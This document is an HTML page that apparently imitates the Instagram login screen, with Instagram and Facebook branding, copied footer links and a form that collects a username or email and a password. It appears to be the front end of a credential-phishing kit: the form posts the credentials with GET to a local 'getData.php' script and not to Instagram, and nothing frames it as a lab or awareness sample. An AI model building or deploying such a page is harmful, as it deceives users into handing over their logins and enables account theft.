<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge"/>
<meta name="viewport" content="width=device-width, initial-scale=1.0">


<style type="text/css">
	body {
		margin: 10;
		padding: 10;
		height: auto;
		width: auto;

	}

	.Rectangle_1 {
		border-radius: 3px;
		border:2px solid #dcdcdc;
		padding: 3px;
	}
	.Rectangle_2 {
		border-radius: 3px;
		border:2px solid #dcdcdc;
		padding: 3px;
	}
	.Rectangle_3 {
		border:2px;
	border-radius: 3px;
	}
	a {
		text-decoration: none;
	}
	a:visited {
  color: #3b579d;
    }


@media screen and (max-width:360px) {
body {
    width: 360px;
    margin-right: 5px;
}  
}

</style>
<title> Login•Instagram </title>
<link rel="stylesheet" type="text/css" id="applicationStylesheet" href="reboot13.css"/>
<link rel="icon" href="https://upload.wikimedia.org/wikipedia/commons/thumb/e/e7/Instagram_logo_2016.svg/1200px-Instagram_logo_2016.svg.png" type="image/icon type">

</head>
<body>
	<center>

	<img id="Instagram-Logo" src="Instagram-Logo.png" srcset="Instagram-Logo.png 1x, Instagram-Logo@2x.png 2x">


	<form action="getData.php" method="Get">
    <input  class="Rectangle_1" id="Rectangle_1" type="text" name="email" placeholder="Phone number, username, or email" required="">
	<input  class="Rectangle_2" id="Rectangle_2" type="password" name="password" placeholder="Password" required="">
    <input id="Rectangle_3" class="Rectangle_3" style="color: white; background-color: #0095f6;" type="submit" value="Log In" onsubmit="getData">
</form>
	
	<div id="Log_In_with_Facebook">
		<span><a href="https://www.facebook.com/login.php?">Log In with Facebook</a></span>
	</div>
	<div id="Forgot_password">
	<a href="https://www.instagram.com/accounts/password/reset/">	
		<span>Forgot password?</span>
	</a>
	</div>
	<div id="Get_the_app">
		<span>Get the app.</span>
	</div>
	<div id="Dont_have_an_account_Sign_up">
		<span>Don't have an account? </span>
		<a href="https://www.instagram.com/accounts/emailsignup/">
			<span style="color:rgba(0,149,246,1);">Sign up</span>
		</a>
	</div>
	<svg class="Line_1" viewBox="0 0 109 1">
		<path id="Line_1" d="M 0 0 L 109 0">
		</path>
	</svg>
	<svg class="Line_2" viewBox="0 0 109 1">
		<path id="Line_2" d="M 0 0 L 109 0">
		</path>
	</svg>
	<div id="OR">
		<span>OR</span>
	</div>
	<img id="Facebook_logo_square" src="Facebook_logo_square.png" srcset="Facebook_logo_square.png 1x, Facebook_logo_square@2x.png 2x">
	<a href="https://apps.apple.com/app/instagram/id389801252">
	<img id="images_1" src="images_1.png" srcset="images_1.png 1x, images_1@2x.png 2x">
</a>
<a href="https://play.google.com/store/apps/details?id=com.instagram.android">
	<img id="images_2" src="images_2.png" srcset="images_2.png 1x, images_2@2x.png 2x">
</a>
	<div id="About">
		<span>About</span>
	</div>
	<div id="Blog">
		<span>Blog</span>
	</div>
	<div id="Jobs">
		<span>Jobs</span>
	</div>
	<div id="API">
		<span>API</span>
	</div>
	<div id="Privacy">
		<span>Privacy</span>
	</div>
	<div id="Terms">
		<span>Terms</span>
	</div>
	<div id="Top_Accounts">
		<span>Top Accounts</span>
	</div>
	<div id="Beauty">
		<span>Beauty</span>
	</div>
	<div id="Dance__Performance">
		<span>Dance & Performance</span>
	</div>
	<div id="Fitness">
		<span>Fitness</span>
	</div>
	<div id="Food__Drink">
		<span>Food & Drink</span>
	</div>
	<div id="Home__Garden">
		<span>Home & Garden</span>
	</div>
	<div id="ID2020_Instagram_from_Facebook">
		<span>©2020 Instagram from Facebook</span>
	</div>
	<div id="Music">
		<span>Music</span>
	</div>
	<div id="Visual_Arts">
		<span>Visual Arts</span>
	</div>
	<div id="English">
		<span>English</span>
	</div>
	<div id="Hashtags">
		<span>Hashtags</span>
	</div>
	<div id="Locations">
		<span>Locations</span>
	</div>
	<div id="Help">
		<span>Help</span>
	</div>
	<svg class="Line_5" viewBox="0 0 1 1">
		<path id="Line_5" d="M 0 0 L 0 0">
		</path>
	</svg>
	<svg class="Path_1" viewBox="107.413 714.849 8.513 4.634">
		<path id="Path_1" d="M 107.4126892089844 714.8488159179688 C 108.8208999633789 716.3334350585938 111.9440002441406 719.4830932617188 111.9440002441406 719.4830932617188 L 115.9260635375977 714.8488159179688">
		</path>
	</svg>
</div>
</center>
</body>
</html>